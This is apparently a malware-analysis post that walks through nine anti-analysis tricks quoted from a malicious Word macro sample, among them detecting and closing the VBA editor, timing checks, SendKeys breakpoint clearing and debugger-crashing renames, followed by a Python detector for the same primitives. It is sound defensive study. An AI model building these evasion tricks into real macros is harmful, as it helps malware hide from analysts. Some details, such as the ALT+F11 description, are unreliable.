Word Document : Anti Analysis Tricks

This post covers anti-analysis tricks that can be used in a Microsoft Office Word document.
Sample used for analysis:
hxxps://virustotal.com/en/file/d49b2f735d5d4334653d705cb0ff837af88a4981253fb68c6d927745d97a1b3f/analysis/

1. Checking the Length of the Word Document's Name
In the malware analysis field a sample is generally saved under its MD5 (32 characters) or SHA-256 (64 characters) hash as the file name, so a document name longer than 16 characters is taken as a sign that the file is being analysed.
// if name length is greater than 16 characters
if Me.Name > 16  Then 
//CallByName "Microsoft Word", "Run",1,FluffyClouds
CallByName Application, ThisDocument.Variables.Item("RegisterProduct"), VbMethod, Application.Documents.Item(1).Variables.Item("UserLookup").Value
//Delete Document Items and Save Document
Do
    ' Fix Later - Jose - 3/2017
    DoEvents
    i = 1
    ActiveDocument.Variables.Item(i).Delete
    i = i + 1
Loop Until ActiveDocument.Variables.Count > 0

ActiveDocument.Save

In this case the document runs the method FluffyClouds via vbMethod, which prints "Game over - Good Bye", deletes all the document variable items and saves the document.

2. Detect Debugger (Microsoft Visual Basic For Applications)
This trick is similar to using the FindWindow API to detect the presence of a debugger: the Tasks collection is queried for the window named "Microsoft Visual Basic For Applications" (the VBA editor), with the window name hidden in the document variable "DailyTaskLog".
//Tasks("Microsoft Visual Basic For Applications").Visible
Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible

3. Time Difference
Compare the difference between two values returned by the Timer function of Visual Basic for Applications (VBA), which counts the seconds elapsed since midnight. This is similar to the rdtsc trick used in executables: stepping through the code in a debugger makes the elapsed time larger than it would be during a normal run.

//if the difference between the two Timer values (seconds elapsed since midnight) is greater than 0 (vbNormal = 0).
If (T2 - CallTimer) > vbNormal Then
' Configure User Corp Account For Data Add In
//run "FluffyClouds" method
CallByName Application, A1.Item("RegisterProduct"), VbMethod, A1.Item("UserLookup").Value 
Else
CallTimer = Timer

4. Schedule Job
Application.OnTime schedules the procedure HostSync to run after 10 seconds. HostSync then sends the WM_CLOSE (&H10) and WM_DESTROY (&H2) window messages to the Microsoft Visual Basic For Applications (VBA editor) window through Task("Microsoft Visual Basic For Applications").SendWindowMessage, i.e. the WordBasic AppSendMessage method, closing the debugger while the macro keeps running.
//schedule the procedure "HostSync" to run at Now + TimeValue("00:00:10"), i.e. after 10 seconds.
Application.OnTime Now + TimeValue("00:00:10"), "HostSync"

Sub HostSync()
//CallByName Application.WordBasic,"AppSendMessage",1,"Microsoft Visual Basic For Applications",16,1,0
//send WM_CLOSE window message to Microsoft Visual Basic For Application (VBA window) using Task("Microsoft Visual Basic For Applications").SendWindowMessage API
' Call Home Folder Sync Settings
CallByName Application.WordBasic, ActiveDocument.Variables("InvoiceNumber"), VbMethod, ActiveDocument.Variables("DailyTaskLog").Value, &H10, 1, 0

//CallByName Application.WordBasic,"AppSendMessage",1,"Microsoft Visual Basic For Applications",2,1,0
//send WM_DESTROY window message to Microsoft Visual Basic For Application (VBA window) using Task("Microsoft Visual Basic For Applications").SendWindowMessage API
' Synchronize Outlook Folders For Invoicing - 2/2016
CallByName Application.WordBasic, ActiveDocument.Variables("InvoiceNumber"), VbMethod, ActiveDocument.Variables("DailyTaskLog").Value, &H2, 1, 0
End Sub

5. Infinite Loop

If the Microsoft Visual Basic For Applications (VBA) editor window is active, its Visible property is set to False.
//loop that keeps setting the Visible property of the Visual Basic Editor window to False.
Do
DoEvents
//Task("Microsoft Visual Basic For Applications").Visible = False
Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible = False
//Loop Until Tasks("Microsoft Visual Basic For Applications").Visible = False
Loop Until Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible = False

6. Application Info: Active Window Size and Word Version

WordBasic.AppInfo(7) returns the same value as Application.UsableHeight (the maximum height of the space that a window can occupy in the application window area); the macro only continues if it is greater than 1000.
WordBasic.AppInfo(2) returns the Microsoft Office Word version (the same as WordBasic.Version); it is compared against vbDirectory - vbHidden, which evaluates to 16 - 2 = 14, i.e. Word 2010 or later.

//AppInfo(7) = Application.UsableHeight
If Application.WordBasic.AppInfo(7) > 1000 Then
//AppInfo(2) = Application.Version >= 14
If CInt(Application.WordBasic.AppInfo(2)) >= (vbDirectory - vbHidden) Then

7. SendKeys Method
If the Microsoft Visual Basic For Applications (VBA) window is active/visible, the SendKeys method is used to send keystrokes to it, with the Wait parameter set to True, which means the application waits for the keys to be processed before returning control to the macro.
A few keystroke values and their meaning:
"%{F11}" = ALT + F11 = Open Word Document.
"^+{F9}" = {CTRL + SHIFT + F9} = Clear All Breakpoints

//Tasks("Microsoft Visual Basic For Applications").Visible    
If Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible Then
//CallByName Application.WordBasic, Sendkeys,1,"^+{F9}",True  
//Send key strokes "^+{F9}" = {CTRL + SHIFT + F9} = Clear All Breakpoints.
//True = process the keystrokes before control is returned to the procedure.
CallByName Application.WordBasic, ActiveDocument.Variables("SalesPipeline").Value, VbMethod, ActiveDocument.Variables("CallLeads").Value, True

8. Directory Count
Get the number of directories under the path denoted by the environment variable %ProgramFiles%. If the count is less than the specified value (30 in this sample), the FluffyClouds method is run and the analysis is terminated.
//EmployeeCount=CallByName(Application.WordBasic,Environ$,VbGet,"%ProgramFiles%")
//"C:\Program Files (x86)" Directory Path
EmployeeCount = CallByName(Application.WordBasic,ActiveDocument.Variables("EmployeeID"),VbGet, ActiveDocument.Variables("ManagerName").Value)

//If CallByName(Application.WordBasic,"CountDirectories",VbMethod,%ProgramFiles%)
If CallByName(Application.WordBasic, ActiveDocument.Variables("GetMgmtName"), VbMethod, EmployeeCount) < 30 Then
//run "FluffyClouds" method
CallByName Application, ActiveDocument.Variables("RegisterProduct"), VbMethod, ActiveDocument.Variables("UserLookup")

9. Renaming Macro - Crash Debugger (Microsoft Visual Basic For Applications)
//Application.OrganizerRename "AntiAn.doc","ThisDocument","Temp",3
//Rename macro "ThisDocument" to "Temp".
Application.OrganizerRename ActiveDocument.FullName, Application.WordBasic.macroname(1), "Temp", wdOrganizerObjectProjectItems
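As an added defender-side example (not code from the original post), the following Python resolves the ActiveDocument.Variables("...") indirection that sections 1 to 9 rely on by reading the w:docVars block that Word stores in word/settings.xml of a .docx, then flags the anti-analysis primitives described above. The settings fragment and macro excerpt are constructed here and the variable values are assumed placeholders; a binary .doc keeps its variables in a different structure and would need a different extractor.

```python
import re
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed w:docVars block as Word stores it in word/settings.xml (names follow the post, values are placeholders).
SETTINGS_XML = f"""<w:settings xmlns:w="{W_NS}"><w:docVars>
  <w:docVar w:name="DailyTaskLog" w:val="Microsoft Visual Basic For Applications"/>
  <w:docVar w:name="InvoiceNumber" w:val="AppSendMessage"/>
  <w:docVar w:name="RegisterProduct" w:val="Run"/>
  <w:docVar w:name="UserLookup" w:val="FluffyClouds"/>
</w:docVars></w:settings>"""

# Constructed macro excerpt written in the style of the sample's obfuscated calls.
MACRO = """Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible = False
CallByName Application.WordBasic, ActiveDocument.Variables("InvoiceNumber"), VbMethod, ActiveDocument.Variables("DailyTaskLog").Value, &H10, 1, 0
CallByName Application, ThisDocument.Variables.Item("RegisterProduct"), VbMethod, Application.Documents.Item(1).Variables.Item("UserLookup").Value
Application.OnTime Now + TimeValue("00:00:10"), "HostSync"
"""

# Matches ActiveDocument.Variables("X"), ThisDocument.Variables.Item("X").Value and similar forms.
VAR_REF = re.compile(
    r'(?:ActiveDocument|ThisDocument|Application\.Documents\.Item\(\d+\))'
    r'\.Variables(?:\.Item)?\("([^"]+)"\)(?:\.Value)?')

# Primitives the post describes, keyed by a substring of the resolved call.
INDICATORS = {
    "Tasks(": "VBE window presence/visibility check",
    "AppSendMessage": "window message (WM_CLOSE/WM_DESTROY) sent to the VBE",
    "Application.OnTime": "delayed callback scheduled with OnTime",
    "SendKeys": "keystrokes injected into the VBE",
    "OrganizerRename": "macro rename that crashes the debugger",
    "AppInfo(": "window size / Word version probe",
    "CallByName": "late-bound call that hides the method name",
}

def load_doc_vars(settings_xml):
    """Return {name: value} for every w:docVar in a settings.xml string."""
    root = ET.fromstring(settings_xml)
    return {v.get(f"{{{W_NS}}}name"): v.get(f"{{{W_NS}}}val") for v in root.iter(f"{{{W_NS}}}docVar")}

def resolve(macro, doc_vars):
    """Replace each document-variable reference with its quoted literal value."""
    return VAR_REF.sub(lambda m: '"%s"' % doc_vars.get(m.group(1), "<unresolved:%s>" % m.group(1)), macro)

def flag(resolved):
    """List (line number, trick) pairs for every anti-analysis primitive in the resolved macro."""
    return [(n, why) for n, line in enumerate(resolved.splitlines(), 1)
            for needle, why in INDICATORS.items() if needle in line]
```

For a real sample, read word/settings.xml out of the .docx zip and the macro source from olevba output, then run the same two functions.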
